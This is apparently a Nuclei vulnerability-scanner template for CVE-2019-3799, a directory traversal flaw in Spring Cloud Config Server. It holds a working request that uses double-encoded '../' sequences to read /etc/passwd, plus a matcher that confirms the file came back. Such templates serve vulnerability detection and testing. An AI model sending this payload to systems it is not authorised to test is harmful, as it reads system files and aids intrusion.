nuclei-templates/cves/CVE-2019-3799.yaml

20 lines
420 B
YAML

id: CVE-2019-3799
info:
name: Spring-Cloud-Config-Server Directory Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- 'root:[x*]:0:0:'
part: body